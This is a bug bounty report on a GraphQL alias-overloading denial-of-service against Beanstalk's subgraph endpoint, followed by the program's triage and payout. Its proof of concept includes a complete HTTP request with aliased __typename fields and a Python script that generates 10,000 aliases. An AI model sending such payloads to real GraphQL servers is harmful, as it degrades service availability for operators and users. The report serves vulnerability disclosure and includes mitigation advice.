📄

Report #27311

Report Date
December 27, 2023
Status
Confirmed
Payout
1,000

Graphql DOS on the endpoint

Report Info

Report ID

#27311

Report type

Websites and Applications

Has PoC?

Yes

Target

https://app.bean.money

Impacts

  • A temporary or self-correcting loss of website availability (e.g. a mitigatable vulnerability to DDoS)

Bug Description

During the testing, It has been noticed that the endpoint of graphql is vulnerable to dos.

Impact

An attacker can down the graphql endpoint.

Risk Breakdown

Difficulty to Exploit: Easy Weakness: CVSS2 Score:

Recommendation

Use the built-in protection offered for Maximum Query Depth & Query Complexity, depending on the GraphQL server implementation chosen.

References

https://checkmarx.com/blog/alias-and-directive-overloading-in-graphql/

Proof of concept

  • Navigate to web page.
  • Send the following request to the endpoint.
POST /subgraphs/name/bean HTTP/1.1
Host: graph.node.bean.money
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://app.bean.money/
Content-Type: application/json
Content-Length: 539
Origin: https://app.bean.money
Dnt: 1
Sec-Gpc: 1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Te: trailers
Connection: close

{"query": "query { alias0:__typename \nalias1:__typename \nalias2:__typename \nalias3:__typename \nalias4:__typename \nalias5:__typename \nalias6:__typename \nalias7:__typename \nalias8:__typename \nalias9:__typename \nalias10:__typename \nalias11:__typename \nalias12:__typename \nalias13:__typename \nalias14:__typename \nalias15:__typename \nalias16:__typename \nalias17:__typename \nalias18:__typename \nalias19:__typename \nalias20:__typename \nalias21:__typename \nalias22:__typename \nalias23:__typename \nalias24:__typename \n } "}
  • Generate payload with 10000 through the following python code :
# Initialize the result string
result = ""

# Loop from 0 to 10000 to generate aliases
for i in range(10000):
    result += f"alias{i}:__typename \\n"

# Print the result string
print(result)
  • Copy into the query.
  • Server response is completed in more than 5s.

BIR-9: Beanstalk Subgraph Mitigatable DoS

BIC Response

After reviewing your bug report, we believe that it is in scope for our bug bounty program and the threat level is High.

Based on our bounty page, this submission's ( Websites and Applications - High ) reward is based on a set of internal criteria established by the BIC (with a minimum reward of USD 1 000), primarily taking into account the exploitability of the bug, the impact it causes and likelihood of the vulnerability presenting itself.

The BIC determined that the impact of this issue is low given the minimal temporary downtime that would be caused by an attack. The report also describes a DDoS attack on the Beanstalk subgraph, not the UI hosted at app.bean.money, which can partially function without the subgraph. For these reasons, the BIC has determined that this bug report be rewarded 1,000 Beans.